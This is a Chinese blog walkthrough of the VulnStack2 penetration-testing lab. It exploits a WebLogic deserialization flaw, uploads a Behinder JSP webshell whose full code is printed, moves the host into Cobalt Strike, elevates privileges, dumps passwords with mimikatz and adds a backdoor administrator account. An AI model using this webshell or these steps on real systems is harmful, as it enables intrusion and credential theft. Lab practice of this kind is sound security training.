【内网渗透】红日VulnStack2

本文最后更新于:2023年10月22日 下午

[TOC]

【内网渗透】红日VulnStack2

环境搭建

1
2
3
4
5
6
7
8
WEB.de1ay.com (web服务器) Server2008
内网ip: 10.10.10.80
外网ip: 192.168.56.80

PC.de1ay.com win7
内网ip: 10.10.10.201
DC.de1ay.com (域控) Server2012
内网ip: 10.10.10.10

信息收集

首先扫ip,端口,发现了一些端口:

1
nmap -T4 -A 192.168.56.80

image-20230926191631441

开放了7001端口,是weblogic服务

image-20230926191723959

访问一下控制台 /console

1
http://192.168.56.80:7001/console/login/LoginForm.jsp

image-20230926191829561

使用weblogicScan扫一下是否存在weblogic漏洞

image-20230926183412646

发现存在反序列化漏洞

于是利用工具weblogicTool可以实现命令执行:

image-20230926195013762

1
2
3
echo %cd%
查看当前工作目录的路径
C:\Oracle\Middleware\user_projects\domains\base_domain

我们可以上传一个jsp木马上去,但是我们不知道上传路径

网上老哥的一种方法:

把shell写到控制台images目录中

1
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\webshell.jsp

我们可以找冰蝎的jsp马:

1
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

上传到:C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\webshell.jsp

image-20230926195412286

上传后访问路径:http://192.168.56.80:7001/console/framework/skins/wlsconsole/images/webshell.jsp

image-20230926195540215

冰蝎连接成功:

image-20230926195627655

内网渗透

冰蝎连上去之后我们将其上线到cs中

首先创建一个监听器:

image-20231022143414390

然后生成一个马

image-20231022143528036

冰蝎上传上去,运行一下,就成功上线cs了,此时为administrator权限

我们右键->elevate。直接提权为system权限

image-20231022143651047

内网信息收集

首先执行systeminfo,发现存在域de1ay.com

image-20231022144157972

ipconfig /all发现存在内网10.10.10.80,网关是10.10.10.1

image-20231022144305404

net time获得域控主机的名称DC.de1ay.com

image-20231022144524120

mimikatz获得账户的密码

image-20231022144744984

portscan扫描内网10.10.10.0/24

image-20231022144832616

发现10.10.10.10的名称为DC,应该就是域控的ip,并且开放了445端口

image-20231022144935978

portscan扫描192.168.56.0网段,发现web服务器开放了3389端口,于是我们可以远程去连接他

image-20231022145220143

可以创建一个用户,并添加为管理员:

1
2
net user leekos L372488621. /add
net localgroup administrators leekos /add

连上去了

image-20231022140202698

下面我们就需要拿下域控主机了10.10.10.10


【内网渗透】红日VulnStack2
https://leekosss.github.io/2023/09/26/[内网渗透]VulnStack2/
作者
leekos
发布于
2023年9月26日
更新于
2023年10月22日
许可协议